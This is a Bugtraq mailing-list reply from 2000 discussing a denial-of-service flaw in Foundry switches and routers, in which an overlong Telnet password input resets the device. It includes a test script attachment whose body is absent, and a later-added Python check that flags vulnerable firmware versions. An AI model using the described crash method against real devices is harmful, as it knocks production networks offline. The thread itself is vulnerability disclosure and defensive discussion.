[17618] in bugtraq


Re: Foundry DoS at login prompt

daemon@ATHENA.MIT.EDU (//Stany)
Mon Nov 13 01:05:18 2000

Mime-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="-559023410-126398554-974064979=:27879"
Message-Id:  <Pine.SO4.4.02.10011121541080.27879-200000@Llewella.NotBSD.org>
Date:         Sun, 12 Nov 2000 16:36:19 -0500
Reply-To: //Stany <stany@NOTBSD.ORG>
From: //Stany <stany@NOTBSD.ORG>
X-To:         lists@DIE.NET
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <Pine.LNX.4.21.0011112325210.846-100000@asherah.die.net>


---559023410-126398554-974064979=:27879
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Sat, 11 Nov 2000 lists@DIE.NET wrote:

> In the release notes for Foundry code v07.1.09, I noticed the statement:
>
> 	If you entered a very long string when prompted for a Telnet
> 	password, then pressed Enter before the software timed out the
> 	access attempt, the device reset.
>
> This functions exactly as it describes on FastIrons, BigIrons, and
> ServerIrons I have access to running various versions of firmware.
> If you can get to a login prompt, you can reload the device.


At the moment the only Foundry device we have in production is  ,
which is a NetIron.

telnet@netiron.magma.ottawa#sh ver
 SW: Version 06.5.10T13 Copyright (c) 1996-1999 Foundry Networks, Inc.
     Compiled on Jan  8 2000 at 02:24:28 labeled as N8R06510
 HW: NetIron Gigabit Switching Router, serial number 04b024
 200 MHz Power PC processor 603 (revision 7) with 32756K bytes of DRAM
  16 100BaseT interfaces with Level 1 Transceiver LXT975

In other words we are rather behind.

I have spent the last half an hour feeding thousands and thousands of As
to the "Please Enter Password:"  prompt, but got nowhere.

I am attaching the script I used for checking.  I tried up to 66000
instances of "A" sent down the line.

Perhaps I am doing something wrong (more than likely my script is buggy),
so please, if someone has more details, especially details that would
convince my management that NetIrons are vulnerable and that we really
should renew a support contract with Foundry Networks, please holler.

> This does not appear to affect ssh logins, which recent versions of the
> Foundry firmware support.
>
> If you have any Foundry gear with externally visible IPs, make sure you
> disable telnet or upgrade your firmware to the latest.  This is particularly
> true if you use their load-balancer product, the ServerIron, which
> also supposedly functions to keep your site highly available.

When I actually make it to work on Monday, I'll be sure to check with a
ServerIron and a FastIron Workgroup that are sitting on my desk.

>                                     -- Aaron

Signed:
//Stany
--
+-------+ Stanislav N Vardomskiy - Procurator Odiosus Ex Infernis[TM] +-------+
| "Backups we have; it's restores that we find tricky." Richard Letts at ASR  |
| This message is powered by JOLT!  For all the sugar and twice the caffeine. |
+--------+ My words are my own.  LARTs are provided free of charge. +---------+

---559023410-126398554-974064979=:27879
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="crashfoundry.exp"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.SO4.4.02.10011121636190.27879@Llewella.NotBSD.org>
Content-Description:
Content-Disposition: attachment; filename="crashfoundry.exp"

---559023410-126398554-974064979=:27879--
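
Added example, not part of the original message or of any Foundry tooling: a small inventory check that parses `sh ver` output like the one quoted above and flags firmware older than 07.1.09, the release whose notes mention the reset. Using 07.1.09 as the baseline for every product line, and the function names, are assumptions of this example.

```python
import re

# Release whose notes (quoted in the message above) mention the Telnet
# password-prompt reset. Using it as the baseline for every product line
# is an assumption of this example.
BASELINE = (7, 1, 9)

# Matches the "SW: Version 06.5.10T13 ..." line of `sh ver` output.
_SW_LINE = re.compile(r"^\s*SW:\s*Version\s+((\d+)\.(\d+)\.(\d+)\S*)", re.M)
# Matches the hardware description up to the first comma.
_HW_LINE = re.compile(r"^\s*HW:\s*([^,\n]+)", re.M)


def parse_show_version(text):
    """Return (version_tuple, raw_version, hardware), or None if no SW line."""
    sw = _SW_LINE.search(text)
    if sw is None:
        return None
    hw = _HW_LINE.search(text)
    hardware = hw.group(1).strip() if hw else "unknown"
    version = tuple(int(part) for part in sw.group(2, 3, 4))
    return version, sw.group(1), hardware


def review_device(text):
    """Classify one device's `sh ver` output for follow-up."""
    parsed = parse_show_version(text)
    if parsed is None:
        return "unparsed: check manually"
    version, raw, hardware = parsed
    if version < BASELINE:
        return "%s %s: older than 07.1.09, restrict telnet or upgrade" % (hardware, raw)
    return "%s %s: at or above 07.1.09" % (hardware, raw)


# Sample copied from the `sh ver` output quoted in the message above.
SAMPLE = """\
 SW: Version 06.5.10T13 Copyright (c) 1996-1999 Foundry Networks, Inc.
     Compiled on Jan  8 2000 at 02:24:28 labeled as N8R06510
 HW: NetIron Gigabit Switching Router, serial number 04b024
"""

if __name__ == "__main__":
    print(review_device(SAMPLE))
```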
